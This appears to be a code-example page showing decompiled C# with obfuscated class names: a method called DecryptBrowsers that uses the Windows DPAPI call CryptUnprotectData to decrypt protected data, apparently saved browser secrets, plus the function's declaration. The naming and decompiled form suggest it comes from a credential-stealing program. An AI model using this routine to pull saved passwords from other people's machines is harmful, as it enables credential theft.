Example #1
0
        // Token: 0x060000B5 RID: 181 RVA: 0x00006600 File Offset: 0x00004800
        public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
        {
            Class_32.DataBlob dataBlob  = default(Class_32.DataBlob);
            Class_32.DataBlob dataBlob2 = default(Class_32.DataBlob);
            Class_32.DataBlob dataBlob3 = default(Class_32.DataBlob);
            Class_32.CryptprotectPromptstruct cryptprotectPromptstruct = new Class_32.CryptprotectPromptstruct
            {
                cbSize        = Marshal.SizeOf(typeof(Class_32.CryptprotectPromptstruct)),
                dwPromptFlags = 0,
                hwndApp       = IntPtr.Zero,
                szPrompt      = null
            };
            string empty = string.Empty;

            try
            {
                try
                {
                    if (cipherTextBytes == null)
                    {
                        cipherTextBytes = new byte[0];
                    }
                    dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
                    dataBlob2.cbData = cipherTextBytes.Length;
                    Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
                }
                catch
                {
                }
                try
                {
                    if (entropyBytes == null)
                    {
                        entropyBytes = new byte[0];
                    }
                    dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
                    dataBlob3.cbData = entropyBytes.Length;
                    Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
                }
                catch
                {
                }
                Class_32.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
                byte[] array = new byte[dataBlob.cbData];
                Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
                return(array);
            }
            catch
            {
            }
            finally
            {
                if (dataBlob.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob.pbData);
                }
                if (dataBlob2.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob2.pbData);
                }
                if (dataBlob3.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob3.pbData);
                }
            }
            return(new byte[0]);
        }
Example #2
0
 private static extern bool CryptUnprotectData(ref Class_32.DataBlob pCipherText, ref string pszDescription, ref Class_32.DataBlob pEntropy, IntPtr pReserved, ref Class_32.CryptprotectPromptstruct pPrompt, int dwFlags, ref Class_32.DataBlob pPlainText);